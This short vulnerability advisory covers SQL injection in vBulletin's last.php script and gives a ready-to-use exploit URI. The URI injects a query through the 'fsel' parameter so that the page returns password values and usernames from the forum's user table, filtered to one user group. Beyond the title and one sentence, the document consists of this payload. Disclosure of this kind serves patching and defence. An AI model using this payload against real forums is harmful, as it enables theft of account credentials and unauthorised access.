vBulletin LAST.PHP SQL Injection Vulnerability

vBulletin LAST.PHP SQL Injection Vulnerability

An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201